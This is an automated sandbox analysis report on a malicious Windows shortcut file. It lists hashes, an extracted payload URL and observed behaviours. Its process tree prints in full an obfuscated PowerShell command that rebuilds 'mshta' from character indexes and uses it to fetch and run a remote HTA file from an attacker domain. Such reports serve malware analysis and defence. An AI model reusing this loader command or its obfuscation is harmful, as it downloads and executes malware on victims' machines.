Analysis
-
max time kernel
10s -
max time network
12s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 10:04
Static task
static1
Behavioral task
behavioral1
Sample
44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb.lnk
Resource
win10v2004-20241007-en
General
-
Target
44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb.lnk
-
Size
2KB
-
MD5
353943828023a63279b82cd395e0801b
-
SHA1
621c1087e5bd6b1b7eee1fa018c781644ee8f932
-
SHA256
44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb
-
SHA512
6ea2765098d77d119f98f3c8613829b897f6da1c0fa26458a175d07a15b6cb425be3f0d4ada6fe3f24e680eeeec098b1472e66216a802862240a6b8dfa9983af
Malware Config
Extracted
https://x2trump.com/x1.hta
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 9 2104 mshta.exe 15 2104 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation cmd.exe -
pid Process 2376 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2376 powershell.exe 2376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2376 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2252 wrote to memory of 2376 2252 cmd.exe 84 PID 2252 wrote to memory of 2376 2252 cmd.exe 84 PID 2376 wrote to memory of 2104 2376 powershell.exe 85 PID 2376 wrote to memory of 2104 2376 powershell.exe 85
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $x='Ac/lum.pa2MrhtSTx1s:o'; &(-join($x[(263-249),(-179+179),(921-918)])) */ (-join($x[(263-249),(-179+179),(921-918)])); */ ~# (-join($x[(-897+902),(263-249),(526-514),(451-438),(-179+179)])); foreach($I in @((943-931),(-222+235),(956-943),(950-943),(-315+333),(-828+847),(-151+153),(833-831),(666-650),(197-188),(227-214),(373-362),(705-701),(-449+454),(677-670),(894-888),(-407+408),(1009-989),(-692+697),(-715+717),(-771+787),(-788+805),(591-585),(-895+907),(499-486),(-834+842))){$p+=$x[$I]}; ~# $p;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://x2trump.com/x1.hta3⤵
- Blocklisted process makes network request
PID:2104
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82